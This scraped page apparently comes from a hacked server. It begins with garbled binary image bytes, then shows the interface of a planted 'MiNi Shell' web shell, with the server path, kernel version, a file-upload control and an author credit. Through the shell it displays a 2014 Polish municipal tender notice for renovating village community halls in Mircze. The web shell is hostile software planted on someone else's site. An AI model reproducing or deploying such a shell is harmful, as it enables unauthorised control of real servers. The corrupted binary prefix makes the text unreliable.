JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140404/115118-N-2014.html

<p class="kh_header"><b>Mircze: Remont świetlic wiejskich wraz z zagospodarowaniem terenu w miejscowościach Modryń Kolonia, Modryniec, Miętkie Kolonia</b><br>
<b>Numer ogłoszenia: 115118 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mircze , ul. Kryłowska 20, 22-530 Mircze, woj. lubelskie, tel. 84 6519015, faks 84 6519062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugmircze.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlic wiejskich wraz z zagospodarowaniem terenu w miejscowościach Modryń Kolonia, Modryniec, Miętkie Kolonia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwość składania ofert częściowych ilość części 3

Opis przedmiotu zamówienia: przedmiotem zamówienia jest Remont świetlic wiejskich oraz zagospodarowanie przestrzeni publicznej w miejscowościach Modryniec, Modryń Kolonia, Miętkie Kolonia

Część zamówienia Nr 1 -Remont świetlicy wiejskiej i zagospodarowanie przestrzeni publicznej 
w miejscowości Modryń Kolonia
Przedmiot zamówienia części pierwszej:
1. Branża budowlana 
1.1 Roboty rozbiórkowe i przygotowawcze, 
1.2 Roboty ziemne,
1.3 Stopy fundamentowe słupków i słupki z cegły wraz z obsadzeniem kotew montażowych,
1.4 Remont ścian fundamentowych (odkopanie, oczyszczenie, osuszenie, wyrównanie,
wykonanie izolacji przeciwwilgociowej oraz ocieplenie ścian fundamentowych, 
1.5 Odwodnienie wokół budynku + Podjazd i schody zewnętrzne+ utwardzone dojście, 
1.6 Roboty nowe - dach przebudowa + pokrycie + obróbki blacharskie + rynny i rury
Spustowe, 
1.7 Stolarka okienna i drzwiowa oraz przygotowanie otworów do obsadzenia ościeży, 
1.8 Docieplenie stropu i obłożenie płyta g-k wodo i ognioodporną, 
1.9 Podłoża i posadzki, 
1.10 Ścianki działowe z płytek piano- lub gazobetonowych o grubości 12cm, 
1.11 Tynki na nowo wykonanych ścianach oraz uzupełniające wokół ościeży drzwiowych, przecieranie istniejących tynków, gładzie na istniejących tynkach i okładziny ścienne w łazience i WC, 
1.12 Roboty malarskie, 
1.13 Docieplenie ścian zewnętrznych + obsadzenie kratek wentylacyjnych w cokole. 
2 Branża elektryczna 
2.1 Roboty demontażowe, 
2.2 Montaż nowej instalacji elektrycznej. 
3 Branża sanitarna wewnętrzna instalacja wod. - kan
3.1 Instalacja wod. i kan. 
4 Branża sanitarna - przyłącza sanitarne kanalizacyjne do zbiornika ścieków
sanitarnych 
4.1 Doprowadzenie ścieków do zbiornika bezodpływowego PE HD, 
4.2 Montaż zbiornika na ścieki sanitarne PE HD fi 1500. 
5 Branża sanitarna - przyłącza wodociągowe do studni wierconej i studnia wiercona
wraz z obudową i urządzeniami 
5.1 Wiercenie studni,
5.2 Zasilanie w energię elektryczną studni, 
5.3 Przyłącze wodociągowe ze studni wierconej fi 32. 

Część zamówienia Nr 2 -Remont świetlicy wiejskiej i zagospodarowanie przestrzeni publicznej 
wraz z remontem budynku gospodarczego w miejscowości Modryniec
Przedmiot zamówienia części drugiej:
Budynek świetlicy 
Branża budowlana 
1.1 Roboty rozbiórkowe i przygotowawcze 
1.2 Roboty ziemne 
1.3 Remont ścian fundamentowych (odkopanie, oczyszczenie, osuszenie, wyrównanie, wykonanie izolacji przeciwwilgociowej oraz ocieplenie ścian fundamentowych 
1.4 Odwodnienie wokół budynku + Podjazd i schody zewnętrzne+ utwardzone dojście 
1.5 Roboty nowe - dach przebudowa + pokrycie + obróbki blacharskie + rynny i rury
spustowe+ odbudowa kominów wentylacyjnych ponad dachem 
1.6 Stolarka okienna i drzwiowa oraz przygotowanie otworów do obsadzenia ościeży 
1.7 Docieplenie stropu i obłożenie płyta g-k wodo i ognioodporną 
1.8 Podłoża i posadzki 
1.9 Ścianki działowe z płytek piano- lub gazobetonowych o grubości 12cm oraz zamurowanie i uzupełnienie otworów 
1.10 Tynki uzupełniające wokół ościeży drzwiowych, przecieranie istniejących tynków, gładzie na istniejących tynkach 
i okładziny ścienne w łazience i WC 
1.11 Roboty malarskie 
1.12 Docieplenie ścian zewnętrznych + obsadzenie kratek wentylacyjnych w cokole 
2 Branża elektryczna 
2.1 Roboty demontażowe 
2.2 Montaż nowej instalacji elektrycznej 
3 Branża sanitarna wewnętrzna instalacja wod. - kan. 
3.1 Instalacja wod. i kan. 
4 Branża sanitarna - przyłącza sanitarne kanalizacyjne do zbiornika ścieków sanitarnych 
4.1 Doprowadzenie ścieków do zbiornika bezodpływowego PE HD 
4.2 Montaż zbiornika na ścieki sanitarne PE HD fi 1500 
5 Branża sanitarna - przyłącza wodociągowe do studni wierconej i studnia wiercona wraz z obudową i urządzeniami 
5.1 Wiercenie studni 
5.2 Zasilanie w energię elektryczną studni 
5.3 Przyłącze wodociągowe ze studni wierconej fi 32 
Suma elementów kosztorysu 

Garaż OSP
1. Branża budowlana 
1.1 Roboty rozbiórkowe i przygotowawcze, 
1.2 Roboty ziemne,
1.3 Remont ścian fundamentowych (odkopanie, oczyszczenie, osuszenie, wyrównanie, wykonanie izolacji przeciwwilgociowej oraz ocieplenie ścian fundamentowych, 
1.4 Odwodnienie wokół budynku + Podjazd do garażu + utwardzone dojście, 
1.5 Roboty nowe - dach przebudowa + pokrycie + obróbki blacharskie + rynny i rury spustowe,
1.6 Docieplenie stropu i obłożenie płyta g-k wodo i ognioodporną,
1.7 Przygotowanie tynków do malowania,
1.8 Roboty malarskie, 
1.9 Docieplenie ścian zewnętrznych + obsadzenie kratek wentylacyjnych w cokole.
2. Branża elektryczna 
2.1 Roboty demontażowe,
2.2 Montaż nowej instalacji elektrycznej.

Budynek gospodarczy
1. Branża budowlana 
1.1 Roboty rozbiórkowe i przygotowawcze, 
1.2 Roboty ziemne, 
1.3 Remont ścian fundamentowych (odkopanie, oczyszczenie, osuszenie, wyrównanie, wykonanie izolacji przeciwwilgociowej oraz ocieplenie ścian fundamentowych, 
1.4 Odwodnienie wokół budynku +podesty schodów, 
1.5 Roboty nowe - dach przebudowa + pokrycie + obróbki blacharskie + rynny i rury spustowe, 
1.6 Stolarka okienna i drzwiowa oraz przygotowanie otworów do obsadzenia ościeży, 
1.7 Docieplenie stropu, 
1.8 Docieplenie ścian zewnętrznych + obsadzenie kratek wentylacyjnych w cokole. 

Część zamówienia Nr 3 -Remont świetlicy wiejskiej i zagospodarowanie przestrzeni publicznej 
w miejscowości Miętkie Kolonia
Przedmiot zamówienia części trzeciej:
1 Branża budowlana 
1.1 Roboty rozbiórkowe i przygotowawcze, 
1.2 Roboty ziemne, 
1.3 Stopy fundamentowe słupków i słupki z cegły wraz z obsadzeniem kotew montażowych,
1.4 Remont ścian fundamentowych (odkopanie, oczyszczenie, osuszenie, wyrównanie, wykonanie izolacji przeciwwilgociowej oraz ocieplenie ścian fundamentowych, 
1.5 Odwodnienie wokół budynku + Podjazd i schody zewnętrzne+ utwardzone dojście, 
1.6 Roboty nowe - dach przebudowa + pokrycie + obróbki blacharskie + rynny i rury spustowe + odbudowa kominów wentylacyjnych ponad dachem,
1.7 Stolarka okienna i drzwiowa oraz przygotowanie otworów do obsadzenia ościeży, 
1.8 Docieplenie stropu i obłożenie płyta g-k wodo i ognioodporną, 
1.9 Podłoża, posadzki; remont podłóg drewnianych, 
1.10 Ścianki działowe z płyty g-k wodo i ognioodpornej na stelażu metalowym, 
1.11 Tynki uzupełniające wokół ościeży drzwiowych, przecieranie istniejących tynków, gładzie na istniejących tynkach 
i okładziny ścienne w łazience i WC, 
1.12 Roboty malarskie,
1.13 Docieplenie ścian zewnętrznych + obsadzenie kratek wentylacyjnych w cokole. 
2 Branża elektryczna 
2.1 Roboty demontażowe, 
2.2 Montaż nowej instalacji elektrycznej. 
3 Branża sanitarna wewnętrzna instalacja wod. - kan. 
3.1 Instalacja wod. i kan. 
4 Branża sanitarna - przyłącza sanitarne kanalizacyjne do zbiornika ścieków
sanitarnych 
4.1 Doprowadzenie ścieków do zbiornika bezodpływowego PE HD, 
4.2 Montaż zbiornika na ścieki sanitarne PE HD fi 1500. 
5 Branża sanitarna - przyłącza wodociągowe do studni wierconej i studnia wiercona
wraz z obudową i urządzeniami 
5.1 Wiercenie studni, 
5.2 Zasilanie w energię elektryczną studni, 
5.3 Przyłącze wodociągowe ze studni wierconej fi 32. 

3.3. Szczegółowy zakres robót oraz technologię robót określa dokumentacja projektowa. Przedmiary robót załączone do specyfikacji są opracowaniem pomocniczym dla zobrazowania skali zamierzenia budowlanego i ułatwienia Wykonawcom oszacowania kosztów realizacji inwestycji, dlatego co do zasady pełnią funkcję pomocniczą, gdyż cena za wykonanie przedmiotu zamówienia jest CENĄ RYCZAŁTOWĄ.  
3.4. Tam gdzie w dokumentacji projektowej, specyfikacjach technicznych oraz w przedmiarach robót zostało wskazane pochodzenie (nazwa, marka, znak towarowy, dostawca, producent) materiałów lub normy, aprobaty specyfikacje i systemy o których mowa w art. 30 ust. 1-3 ustawy - Prawo zamówień publicznych, Zamawiający dopuszcza oferowanie materiałów, rozwiązań równoważnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z wydanym pozwoleniem na budowę oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach.
3.5. W związku z opisaniem przedmiotu zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1 - 3 Pzp zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-5, 45.26.11.00-5, 45.26.12.10-9, 45.32.00.00-6, 45.32.10.00-3, 45.41.00.00-4, 45.43.10.00-7, 45.44.21.00-8, 45.44.23.00-0, 45.42.11.00-5, 45.44.30.00-4, 45.31.70.00-2, 45.33.00.00-9, 45.26.22.20-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości:
Część pierwsza zamówienia - 3500,00 złotych (słownie: trzy tysiące pięćset złotych)
Część druga zamówienia - 5000,00 złotych (słownie: pięć tysięcy złotych)
Część trzecia zamówienia - 3000,00 złotych (słownie: trzy tysiące złotych)
8.2. Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art.45 ust. 6 ustawy Prawo zamówień publicznych: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz.U. z 2007r. Nr 42, poz.275 z późn. zm.)
8.3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto: Bank Spółdzielczy w Dołhobyczowie O/Mircze, nr konta 90 9603 1016 2001 0000 0185 0003.
8.4 Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 24.04.2014r. do godz. 10:00 - Za termin wniesienia wadium w formie pieniężnej przyjmuje się dzień i godzinę uznania rachunku Zamawiającego kwotą wadium.
8.5 Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych.
8.6 Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku, gdy:
8.6.1. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8.6.2 Wykonawca, którego oferta zostanie wybrana: - odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, - nie wniesienie wymaganego zabezpieczenia należytego wykonania umowy
- zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.6.3. W tytule wadium należy wpisać numer (numery) części zamówienia w wadium, które będzie wnoszone w formie innej jak pieniężne należy wpisać numer (numery) części zamówienia na które składa się ofertę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugmircze.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mircze, ulica Kryłowska 20, 22-530 Mircze. Pokój nr 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 10:00, miejsce: Urząd Gminy Mircze, ulica Kryłowska 20, 22-530 Mircze. Pokój nr 105 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane ze środków Unii Europejskiej; projekt dofinansowany w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com